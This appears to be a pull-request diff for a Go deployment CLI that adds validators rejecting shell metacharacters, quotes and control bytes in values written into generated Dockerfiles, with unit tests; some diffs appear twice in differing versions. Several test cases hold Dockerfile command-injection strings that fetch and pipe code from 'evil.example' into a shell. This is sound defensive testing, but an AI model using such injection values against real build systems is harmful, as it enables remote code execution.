+func TestComputeFlags_RejectsUnsafeA2AAgentCardURL(t *testing.T) {
+	maliciousURL := `http://127.0.0.1:8081"]` + "\nRUN curl evil.example | sh\n#"
+	resetFlags(t, "main.go", maliciousURL)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --a2a_agent_url value")
+	}
+	if !strings.Contains(err.Error(), "a2a_agent_url") {
+		t.Errorf("computeFlags() error = %v, want it to mention --a2a_agent_url", err)
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go", "http://127.0.0.1:8081")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+}

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
@@ -1,0 +1,303 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package cloudrun
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"slices"
+	"strings"
+	"testing"
+	"time"
+)
+
+// resetFlags points the package-level flags var at a fresh, minimally valid
+// state for the duration of one test, restoring the previous value afterwards.
+// computeFlags reads and writes that global directly, so without the restore
+// one test's leftovers (an absolutised entryPointPath, a consumed tempDir)
+// would be the next test's starting state.
+//
+// The state installed here is the zero value plus the three fields computeFlags
+// needs, so a test that depends on a flag default (serverPort, which cobra
+// registers as 8080) sets it itself rather than inheriting it.
+func resetFlags(t *testing.T, entryPointPath, a2aAgentCardURL string) {
+	t.Helper()
+	saved := flags
+	t.Cleanup(func() { flags = saved })
+
+	flags = deployCloudRunFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = t.TempDir()
+	flags.cloudRun.a2aAgentCardURL = a2aAgentCardURL
+}
+
+// allowListRejection is the part of the ValidateShellArgSafe rejection message
+// that no other validator produces. The test below matches on it rather than on
+// a label, because "entry point" is also a substring of the pre-existing
+// StripExtension wrapper ("cannot strip '.go' extension from entry point path
+// '%v'"): a payload edited to drop the .go extension would then satisfy a
+// label-only assertion while saying nothing about the allow-list. It names the
+// two reasons rather than the rejection itself, because the shorter sentence
+// ("not allowed in a value embedded in generated Dockerfile content") is in
+// ValidateDockerfileSafe's message too, and matching that would let execFile be
+// downgraded to the weaker check unnoticed.
+const allowListRejection = "whitespace splits COPY operands and shell metacharacters are live in a RUN line"
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, which is
+	// embedded directly into the generated Dockerfile's COPY/CMD lines. The
+	// benign directory component is what makes the %q assertion below able to
+	// tell the raw flag value from the derived basename it guards: without it
+	// the two strings are byte-identical.
+	maliciousEntryPoint := "cmd/quickstart/main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint, "http://127.0.0.1:8081")
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), allowListRejection) {
+		t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+	}
+	// The checked value is derived from the flag rather than typed, so the
+	// message has to carry the flag and the value as typed for the user to
+	// locate it. Asserted as one string so the label cannot stay while the
+	// check moves onto some other processed form of the path.
+	if want := fmt.Sprintf("derived from --entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+		t.Errorf("computeFlags() error = %v, want it to contain %s", err, want)
+	}
+}
+
+func TestComputeFlags_RejectsUnsafeA2AAgentCardURL(t *testing.T) {
+	maliciousURL := `http://127.0.0.1:8081"]` + "\nRUN curl evil.example | sh\n#"
+	resetFlags(t, "main.go", maliciousURL)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --a2a_agent_url value")
+	}
+	if !strings.Contains(err.Error(), "a2a_agent_url") {
+		t.Errorf("computeFlags() error = %v, want it to mention --a2a_agent_url", err)
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go", "http://127.0.0.1:8081")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+	// Deriving execFile above os.MkdirTemp and assigning execPath below it is
+	// what keeps a rejected invocation from leaving a temp dir behind, but it
+	// also means the two are no longer set together, and only the ordering puts
+	// execPath inside the directory that was created. compileEntryPoint writes
+	// the binary at execPath and the Dockerfile COPYs it out of the build
+	// context, so an execPath that resolved against the raw --temp_dir instead
+	// would fail every deploy on a missing COPY source.
+	if !strings.HasPrefix(flags.build.execPath, flags.build.tempDir+"/") {
+		t.Errorf("execPath = %q, want it inside the created temp dir %q", flags.build.execPath, flags.build.tempDir)
+	}
+}
+
+// TestComputeFlags_AcceptsNonASCIIEntryPoint guards the deliberate decision to
+// let the shell-arg allowlist admit non-ASCII runes: every byte of a multi-byte
+// UTF-8 rune is >= 0x80, so none of them can be a shell metacharacter or a
+// Dockerfile token separator, and rejecting them would fail deploys that work
+// today.
+func TestComputeFlags_AcceptsNonASCIIEntryPoint(t *testing.T) {
+	resetFlags(t, "agentes/café/agenté.go", "http://127.0.0.1:8081")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for a non-ASCII entry point path", err)
+	}
+	if flags.build.execFile != "agenté" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "agenté")
+	}
+}
+
+// TestComputeFlags_RejectsWhitespaceInExecFile guards the reason execFile keeps
+// the allowlist here even though this Dockerfile has no RUN instruction. COPY
+// splits its operands on whitespace, so an execFile containing a space emits
+// "COPY my agent  /app/my agent" and fails the build. A space is exactly what
+// ValidateDockerfileSafe permits, so relaxing execFile to it would reintroduce
+// that. The tab case does not carry the argument, since both checks reject a
+// control byte; it is here to cover the other whitespace character.
+func TestComputeFlags_RejectsWhitespaceInExecFile(t *testing.T) {
+	for _, entryPoint := range []string{"my agent.go", "my\tagent.go"} {
+		resetFlags(t, entryPoint, "http://127.0.0.1:8081")
+
+		if err := flags.computeFlags(); err == nil {
+			t.Errorf("computeFlags() with entry point %q = nil, want an error: the COPY operands would not survive whitespace", entryPoint)
+		}
+	}
+}
+
+// TestComputeFlags_RejectionLeavesNoTempDir pins the ordering of every check
+// that can fail against os.MkdirTemp. cleanTemp only runs after a fully
+// successful deploy, there is no defer, so a check that fires after the temp
+// dir is created leaves an empty cloudrun_<timestamp>_* directory behind on
+// every rejected invocation. Nothing above os.MkdirTemp needs the directory;
+// the fields that resolve against it (execPath, dockerfileBuildPath) are
+// assigned below it.
+//
+// The third case is the one main leaks on today: StripExtension moved above
+// os.MkdirTemp with the two validators, and an entry point path with no ".go"
+// suffix is the only way to reach it.
+func TestComputeFlags_RejectionLeavesNoTempDir(t *testing.T) {
+	for name, payload := range map[string]struct{ entryPoint, agentURL string }{
+		"unsafe entry point": {"main\"\nRUN curl evil.example | sh\n#.go", "http://127.0.0.1:8081"},
+		"unsafe a2a url":     {"main.go", "http://127.0.0.1:8081\"]\nRUN curl evil.example | sh\n#"},
+		"no .go extension":   {"main", "http://127.0.0.1:8081"},
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, payload.entryPoint, payload.agentURL)
+			parent := flags.build.tempDir
+
+			if err := flags.computeFlags(); err == nil {
+				t.Fatal("computeFlags() = nil, want an error")
+			}
+			entries, err := os.ReadDir(parent)
+			if err != nil {
+				t.Fatalf("cannot read the temp dir parent: %v", err)
+			}
+			for _, e := range entries {
+				t.Errorf("rejected invocation left %q behind in the temp dir parent", e.Name())
+			}
+		})
+	}
+}
+
+// TestPrepareDockerfile_ReadsReceiverNotGlobal is the only test in this package
+// that drives prepareDockerfile from a receiver that is not the package global.
+// Everywhere else the two are the same struct, so a value read off the global
+// still emits the right bytes and the drift the receiver conversion removed
+// would come back silently. Here the global holds different values, so a single
+// flags.cloudRun read turns this red, for every value and every branch
+// condition prepareDockerfile has, not just the ones the allowlist guards.
+func TestPrepareDockerfile_ReadsReceiverNotGlobal(t *testing.T) {
+	const (
+		receiverPort = 9091
+		receiverURL  = "http://127.0.0.1:9099"
+		proxyPort    = 9098
+	)
+	// The global: a different port, a different --a2a_agent_url, a different
+	// executable name, a different proxy port, and every optional block left
+	// off. The last one is what pins the branch conditions as well as the
+	// values: a prepareDockerfile that tested flags.cloudRun.a2a would skip the
+	// block that carries the URL entirely.
+	resetFlags(t, "main.go", "http://127.0.0.1:8081")
+	flags.cloudRun.serverPort = 8080
+	flags.build.execFile = "other"
+	flags.proxy.port = 8000
+
+	// Every optional block on, each with a value the global does not hold.
+	f := &deployCloudRunFlags{}
+	f.build.execFile = "main"
+	f.build.dockerfileBuildPath = filepath.Join(t.TempDir(), "Dockerfile")
+	f.cloudRun.serverPort = receiverPort
+	f.proxy.port = proxyPort
+	f.cloudRun.a2a = true
+	f.cloudRun.a2aAgentCardURL = receiverURL
+	f.cloudRun.api = true
+	f.cloudRun.debugAPI = true
+	f.cloudRun.webui = true
+	f.cloudRun.pubsub = true
+	f.cloudRun.pubsubTrigger = triggerConfigFlags{maxRetries: 11, baseDelay: 2 * time.Second, maxDelay: 33 * time.Second, maxRuns: 44}
+	f.cloudRun.eventarc = true
+	f.cloudRun.eventarcTrigger = triggerConfigFlags{maxRetries: 55, baseDelay: 6 * time.Second, maxDelay: 47 * time.Second, maxRuns: 88}
+
+	if err := f.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+	content, err := os.ReadFile(f.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	if !strings.Contains(string(content), "\nEXPOSE 9091\n") {
+		t.Errorf("Dockerfile does not EXPOSE the receiver's server port:\n%s", content)
+	}
+	if !strings.Contains(string(content), receiverURL) {
+		t.Errorf("Dockerfile does not carry the receiver's --a2a_agent_url:\n%s", content)
+	}
+	// execFile is the value the strict allow-list exists for in this package:
+	// it is both COPY operands and the CMD argv[0]. Nothing else in the file
+	// distinguishes a receiver read from a global one for it.
+	if !strings.Contains(string(content), "\nCOPY main  /app/main\n") {
+		t.Errorf("Dockerfile does not COPY the receiver's execFile:\n%s", content)
+	}
+	if !strings.Contains(string(content), `["/app/main", "web"`) {
+		t.Errorf("Dockerfile CMD does not run the receiver's execFile:\n%s", content)
+	}
+	// The rest of the CMD array, one assertion per optional block, asserted as
+	// the whole emitted segment so each covers its branch condition and every
+	// value inside it. Nothing can be injected through these, since they are
+	// ints, durations and bools, but they are the remainder of the same property,
+	// and no other test in this package sets the flags that emit them.
+	for name, want := range map[string]string{
+		"api":      `, "api", "-webui_address", "127.0.0.1:9098", "-include_debug_api"`,
+		"webui":    `, "webui", "--api_server_address", "http://127.0.0.1:9098/api"`,
+		"pubsub":   `, "pubsub", "--trigger_max_retries", "11", "--trigger_base_delay", "2s", "--trigger_max_delay", "33s", "--trigger_max_concurrent_runs", "44"`,
+		"eventarc": `, "eventarc", "--trigger_max_retries", "55", "--trigger_base_delay", "6s", "--trigger_max_delay", "47s", "--trigger_max_concurrent_runs", "88"`,
+	} {
+		if !strings.Contains(string(content), want) {
+			t.Errorf("Dockerfile CMD does not carry the receiver's %s block %s:\n%s", name, want, content)
+		}
+	}
+}
+
+// TestPrepareDockerfile_A2AURLReachesCMDArray runs the branch that interpolates
+// --a2a_agent_url, which only fires when --a2a is set, and checks the emitted
+// CMD is still a parseable JSON array carrying the value. Without this the
+// validator and the line it protects are only connected by reading the code.
+func TestPrepareDockerfile_A2AURLReachesCMDArray(t *testing.T) {
+	const agentURL = "http://127.0.0.1:8081"
+	resetFlags(t, "main.go", agentURL)
+	flags.cloudRun.a2a = true
+	flags.cloudRun.serverPort = 8080
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error", err)
+	}
+	if err := flags.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+
+	content, err := os.ReadFile(flags.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	var cmdLine string
+	for _, line := range strings.Split(string(content), "\n") {
+		if rest, ok := strings.CutPrefix(line, "CMD "); ok {
+			cmdLine = rest
+		}
+	}
+	if cmdLine == "" {
+		t.Fatalf("no CMD instruction in the generated Dockerfile:\n%s", content)
+	}
+
+	var args []string
+	if err := json.Unmarshal([]byte(cmdLine), &args); err != nil {
+		t.Fatalf("CMD %s does not parse as a JSON array: %v", cmdLine, err)
+	}
+	if !slices.Contains(args, agentURL) {
+		t.Errorf("CMD args = %q, want them to carry %q", args, agentURL)
+	}
+}

--- a/internal/cli/util/text_helpers.go
+++ b/internal/cli/util/text_helpers.go
@@ -14,11 +14,86 @@
 
 package util
 
-import "strings"
+import (
+	"fmt"
+	"strings"
+	"unicode/utf8"
+)
 
 func CenterString(s string, w int) string {
 	sw := w - len(s)
 	lw := sw / 2
 	rw := sw - lw
 	return strings.Repeat(" ", lw) + s + strings.Repeat(" ", rw)
+}
+
+// ValidateDockerfileSafe reports an error if s contains a byte that, embedded
+// literally into generated Dockerfile content, could break out of the
+// double-quoted string it sits in or out of the current instruction entirely.
+// Dockerfile instructions are newline-delimited and offer no generic escaping
+// mechanism for interpolated values, so the check rejects rather than quotes.
+//
+// The rejected set is '"', '`', '\', every C0 control byte (which covers NUL,
+// LF and CR), and any string that is not valid UTF-8. Backslash and the
+// remaining control bytes are part of it because an exec-form CMD must be a
+// valid JSON array, and Docker's response to an unparseable exec form is not to
+// fail the build but to silently reinterpret the whole instruction as shell
+// form. A value that does parse can still be wrong: JSON decodes, say, "\n" into
+// a real newline, and an invalid UTF-8 byte is replaced with U+FFFD by both the
+// Dockerfile parser and Go's JSON decoder, so the container would receive
+// something other than what was written. Accepting a value therefore guarantees
+// the emitted CMD line still parses as JSON, and that the value survives into
+// the container unchanged.
+//
+// This is the weaker of the two checks. A value that reaches a RUN instruction
+// needs ValidateShellArgSafe instead.
+func ValidateDockerfileSafe(s, label string) error {
+	// Deliberately a byte loop rather than a rune loop: the property being
+	// enforced is about the bytes written to the file.
+	for i := 0; i < len(s); i++ {
+		if c := s[i]; c == '"' || c == '`' || c == '\\' || c < 0x20 {
+			return fmt.Errorf("%s %q contains a character (quote, backtick, backslash, or a control character) that is not allowed in a value embedded in generated Dockerfile content", label, s)
+		}
+	}
+	if !utf8.ValidString(s) {
+		return fmt.Errorf("%s %q is not valid UTF-8; the invalid bytes would reach the container as U+FFFD rather than as written", label, s)
+	}
+	return nil
+}
+
+// ValidateShellArgSafe reports an error if s contains anything other than a
+// plain path/filename character: letters, digits, '.', '/', '-', '_', or a
+// non-ASCII rune. It is the check for a value that reaches a Dockerfile RUN
+// instruction, which runs in shell form (`/bin/sh -c "..."`), so shell
+// metacharacters such as ';', '|', '&', or '$()' are dangerous there even
+// without any quote or newline breakout. It is also the check for a value that
+// lands in a COPY operand, since COPY splits its operands on whitespace, which
+// ValidateDockerfileSafe permits.
+//
+// Non-ASCII characters are admitted because excluding them buys no safety and
+// does break working deploys. Every byte of a multi-byte UTF-8 rune is >= 0x80
+// while every shell metacharacter, and every byte the Dockerfile parser treats
+// as a token separator, is ASCII. Meanwhile the values checked here include a
+// whole --entry_point_path, whose directory components routinely carry
+// characters no Go filename would. ASCII punctuation outside the class stays
+// rejected even where it is inert today, so the allowlist does not depend on
+// where a future caller interpolates the value.
+func ValidateShellArgSafe(s, label string) error {
+	// A byte loop, for the same reason as in ValidateDockerfileSafe. Every byte
+	// of a multi-byte rune is >= 0x80, so the class can be applied per byte and
+	// the UTF-8 check below rules out a stray high byte that is not part of one.
+	for i := 0; i < len(s); i++ {
+		c := s[i]
+		switch {
+		case c >= 'A' && c <= 'Z', c >= 'a' && c <= 'z', c >= '0' && c <= '9':
+		case c == '_', c == '.', c == '/', c == '-':
+		case c >= 0x80:
+		default:
+			return fmt.Errorf("%s %q contains a character not allowed in a value embedded in generated Dockerfile content; whitespace splits COPY operands and shell metacharacters are live in a RUN line, so only letters, digits, '.', '/', '-', '_', and non-ASCII characters are permitted", label, s)
+		}
+	}
+	if !utf8.ValidString(s) {
+		return fmt.Errorf("%s %q is not valid UTF-8; a COPY operand containing an invalid byte does not match the file it names", label, s)
+	}
+	return nil
 }

--- a/internal/cli/util/text_helpers.go
+++ b/internal/cli/util/text_helpers.go
@@ -14,11 +14,43 @@
 
 package util
 
-import "strings"
+import (
+	"fmt"
+	"regexp"
+	"strings"
+)
 
 func CenterString(s string, w int) string {
 	sw := w - len(s)
 	lw := sw / 2
 	rw := sw - lw
 	return strings.Repeat(" ", lw) + s + strings.Repeat(" ", rw)
+}
+
+// ValidateDockerfileSafe reports an error if s contains a character that
+// would let it break out of the double-quoted string, or out of the current
+// instruction entirely, when embedded literally into generated Dockerfile
+// content (Dockerfile instructions are newline-delimited, and none of them
+// define a generic escaping mechanism for interpolated values).
+func ValidateDockerfileSafe(s, label string) error {
+	if strings.ContainsAny(s, "\"`\n\r\x00") {
+		return fmt.Errorf("%s %q contains a character (quote, backtick, newline, or NUL) that is not allowed in a value embedded in generated Dockerfile content", label, s)
+	}
+	return nil
+}
+
+var shellArgSafeRE = regexp.MustCompile(`^[A-Za-z0-9_./-]*$`)
+
+// ValidateShellArgSafe reports an error if s contains anything other than a
+// plain path/filename character (letters, digits, '.', '/', '-', '_'). This
+// is required (not just ValidateDockerfileSafe's narrower quote/newline
+// check) for a value embedded into a Dockerfile RUN instruction: RUN runs in
+// shell form (`/bin/sh -c "..."`), so shell metacharacters such as ';', '|',
+// '&', or '$()' are dangerous there even without any quote or newline
+// breakout, since the whole RUN line is itself a shell command.
+func ValidateShellArgSafe(s, label string) error {
+	if !shellArgSafeRE.MatchString(s) {
+		return fmt.Errorf("%s %q contains a character not allowed in a value embedded in a generated Dockerfile RUN instruction; only letters, digits, '.', '/', '-', and '_' are permitted", label, s)
+	}
+	return nil
 }

--- a/internal/cli/util/text_helpers_test.go
+++ b/internal/cli/util/text_helpers_test.go
@@ -1,0 +1,74 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package util
+
+import "testing"
+
+func TestValidateDockerfileSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "url", value: "http://127.0.0.1:8081", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "newline breaks out of the current instruction", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "carriage return", value: "x\rRUN curl evil.example | sh", wantErr: true},
+		{name: "double quote breaks out of a CMD JSON-array string", value: `x", "extra"]`, wantErr: true},
+		{name: "backtick", value: "x`whoami`", wantErr: true},
+		{name: "NUL byte", value: "x\x00y", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateDockerfileSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateDockerfileSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestValidateShellArgSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "semicolon command separator", value: "main.go; curl evil.example | sh #", wantErr: true},
+		{name: "pipe to shell", value: "main.go | sh", wantErr: true},
+		{name: "ampersand background/chain", value: "main.go && curl evil.example", wantErr: true},
+		{name: "command substitution", value: "$(curl evil.example)", wantErr: true},
+		{name: "backtick command substitution", value: "`curl evil.example`", wantErr: true},
+		{name: "space", value: "main go", wantErr: true},
+		{name: "newline", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "double quote", value: `x"`, wantErr: true},
+		{name: "url is rejected (not a path)", value: "http://127.0.0.1:8081", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateShellArgSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateShellArgSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}

--- a/internal/cli/util/text_helpers_test.go
+++ b/internal/cli/util/text_helpers_test.go
@@ -1,0 +1,202 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package util
+
+import (
+	"encoding/json"
+	"strings"
+	"testing"
+	"unicode/utf8"
+)
+
+func TestValidateDockerfileSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "url", value: "http://127.0.0.1:8081", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "newline breaks out of the current instruction", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "carriage return", value: "x\rRUN curl evil.example | sh", wantErr: true},
+		{name: "double quote breaks out of a CMD JSON-array string", value: `x", "extra"]`, wantErr: true},
+		{name: "backtick", value: "x`whoami`", wantErr: true},
+		{name: "NUL byte", value: "x\x00y", wantErr: true},
+		// A backslash keeps the CMD array parseable but silently changes the
+		// decoded argument, so "http://x\ny" would reach the container with a
+		// real newline in it.
+		{name: "backslash escape decodes to a different value", value: `http://x\ny`, wantErr: true},
+		// A lone backslash instead makes the array unparseable, and Docker
+		// answers an unparseable exec form by rerunning it as shell form.
+		{name: "trailing backslash breaks CMD JSON", value: `http://x\`, wantErr: true},
+		{name: "tab is a control byte", value: "x\ty", wantErr: true},
+		{name: "escape byte", value: "x\x1by", wantErr: true},
+		// Non-ASCII is fine here: it cannot terminate a JSON string.
+		{name: "non-ASCII", value: "http://café.example", wantErr: false},
+		// Invalid UTF-8 keeps the array parseable, but the Dockerfile parser
+		// and the JSON decoder both turn the byte into U+FFFD, so the container
+		// receives a value nobody wrote.
+		{name: "invalid UTF-8 does not survive to the container", value: "http://x\xffy", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateDockerfileSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateDockerfileSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestValidateShellArgSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "semicolon command separator", value: "main.go; curl evil.example | sh #", wantErr: true},
+		{name: "pipe to shell", value: "main.go | sh", wantErr: true},
+		{name: "ampersand background/chain", value: "main.go && curl evil.example", wantErr: true},
+		{name: "command substitution", value: "$(curl evil.example)", wantErr: true},
+		{name: "backtick command substitution", value: "`curl evil.example`", wantErr: true},
+		{name: "space", value: "main go", wantErr: true},
+		{name: "newline", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "double quote", value: `x"`, wantErr: true},
+		{name: "backslash", value: `x\y`, wantErr: true},
+		{name: "url is rejected (not a path)", value: "http://127.0.0.1:8081", wantErr: true},
+		// Non-ASCII is admitted: every byte of a multi-byte UTF-8 rune is
+		// >= 0x80, so none of them can be a shell metacharacter. Rejecting
+		// these failed deploys that work today, which is the whole reason the
+		// class is wider than a bare [A-Za-z0-9_./-].
+		{name: "non-ASCII filename", value: "agenté", wantErr: false},
+		{name: "non-ASCII directory component", value: "agentes/café/main.go", wantErr: false},
+		{name: "non-Latin script", value: "агент", wantErr: false},
+		// Every other non-ASCII case here is in the Basic Multilingual Plane.
+		// A supplementary-plane rune is four bytes rather than two or three,
+		// and is the case a UTF-16-shaped implementation would get wrong, so
+		// the class boundary is stated here rather than left implicit in the
+		// utf8.MaxRune bound of the property test below.
+		{name: "supplementary-plane rune", value: "agent😀", wantErr: false},
+		// Not covered by the reason above: a raw 0xff is not a metacharacter,
+		// but it never deployed either. The build warns about the encoding and
+		// COPY then fails to find a file whose name came through as U+FFFD.
+		{name: "invalid UTF-8", value: "agent\xff", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateShellArgSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateShellArgSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+// cmdArgs parses the exec-form CMD line cloudrun.go emits, with value
+// interpolated as the --a2a_agent_url argument.
+func cmdArgs(value string) ([]string, error) {
+	var args []string
+	err := json.Unmarshal([]byte(`["/app/main", "web", "--a2a_agent_url", "`+value+`"]`), &args)
+	return args, err
+}
+
+// TestValidateDockerfileSafe_AcceptedValuesKeepCMDParseable pins the property
+// the doc comment claims, which a table of hand-picked payloads cannot: every
+// value the check accepts must leave the generated exec-form CMD parseable as a
+// JSON array, and must survive the parse unchanged. Docker answers an
+// unparseable exec form by silently rerunning the instruction as shell form, so
+// a gap here is not a build failure but a change of execution mode.
+func TestValidateDockerfileSafe_AcceptedValuesKeepCMDParseable(t *testing.T) {
+	// Every single byte, so that no control byte, escape character or invalid
+	// UTF-8 byte slips through unnoticed.
+	for b := 0; b < 0x100; b++ {
+		value := "http://x" + string([]byte{byte(b)}) + "y"
+		if ValidateDockerfileSafe(value, "test value") != nil {
+			continue
+		}
+		args, err := cmdArgs(value)
+		if err != nil {
+			t.Errorf("byte 0x%02x is accepted but makes the CMD line unparseable: %v", b, err)
+			continue
+		}
+		if got := args[len(args)-1]; got != value {
+			t.Errorf("byte 0x%02x is accepted but decodes to %q, want %q", b, got, value)
+		}
+	}
+
+	// Every valid rune, as the valid UTF-8 that a flag value actually carries,
+	// so that an accepted value also reaches the container as it was written.
+	// Up to utf8.MaxRune rather than the BMP, so a supplementary-plane
+	// character in a path (an emoji, CJK Ext-B) is covered by the claim above.
+	for r := rune(0); r <= utf8.MaxRune; r++ {
+		if !utf8.ValidRune(r) {
+			continue
+		}
+		value := "http://x" + string(r) + "y"
+		if ValidateDockerfileSafe(value, "test value") != nil {
+			continue
+		}
+		args, err := cmdArgs(value)
+		if err != nil {
+			t.Errorf("rune %U is accepted but makes the CMD line unparseable: %v", r, err)
+			continue
+		}
+		if got := args[len(args)-1]; got != value {
+			t.Errorf("rune %U is accepted but decodes to %q, want %q", r, got, value)
+		}
+	}
+}
+
+// TestValidateShellArgSafe_ByteClass pins the allow-list: nothing outside the
+// intended ASCII class may be accepted, and no valid non-ASCII rune may be
+// rejected, since every byte of one is >= 0x80 and can never be a shell
+// metacharacter or a Dockerfile token separator. A byte >= 0x80 outside a valid
+// rune is a different case and is rejected.
+func TestValidateShellArgSafe_ByteClass(t *testing.T) {
+	const allowedASCII = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_./-"
+
+	for b := 0; b < 0x80; b++ {
+		accepted := ValidateShellArgSafe(string([]byte{byte(b)}), "test value") == nil
+		want := strings.ContainsRune(allowedASCII, rune(b))
+		if accepted != want {
+			t.Errorf("byte 0x%02x accepted = %v, want %v", b, accepted, want)
+		}
+	}
+
+	// Up to utf8.MaxRune, not just the BMP: a supplementary-plane character in
+	// a directory name is as much a "valid non-ASCII rune" as a BMP one, and
+	// the claim above covers it.
+	for r := rune(0x80); r <= utf8.MaxRune; r++ {
+		if !utf8.ValidRune(r) {
+			continue
+		}
+		if err := ValidateShellArgSafe("agent"+string(r), "test value"); err != nil {
+			t.Errorf("rune %U rejected: %v", r, err)
+		}
+	}
+
+	for b := 0x80; b < 0x100; b++ {
+		if err := ValidateShellArgSafe("agent"+string([]byte{byte(b)}), "test value"); err == nil {
+			t.Errorf("lone byte 0x%02x accepted, want rejected: it is not part of a valid rune", b)
+		}
+	}
+}


### PR DESCRIPTION
